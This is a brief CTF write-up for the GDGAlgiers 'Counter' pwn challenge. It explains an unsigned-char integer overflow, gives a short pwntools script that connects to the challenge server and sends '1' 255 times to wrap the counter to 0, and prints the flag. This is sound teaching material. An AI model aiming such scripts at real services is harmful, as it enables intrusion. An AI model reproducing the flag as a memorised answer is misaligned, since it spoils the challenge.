Post

Counter

Posted
By acelxrd 1 min read

Description

I heard that adding numbers in C is very tricky, can you prove that to me with this challenge?

Steps

by analyzing the counter.c file we can see that the counter is initialized as an unsigned char which is vulnerable to an integer overflow

Solution

we just need to keep calling the increment code segment 255 times to wrap the integer around to 0

1
2
3
4
5
6
7
8
9

from pwn import *

# target = process("./counter")
target = remote("pwn.chal.ctf.gdgalgiers.com", 1402)

for i in range(0, 255):
    print(target.recvuntil("Choice: ").decode())
    target.sendline("1")
target.interactive()

Flag

CyberErudites{1NtegeR_0v3rfloWS_ar3_Na$ty}

CTF, GDGAlgiers
GDGAlgiers Pwn Integer Overflow
This post is licensed under CC BY 4.0 by the author.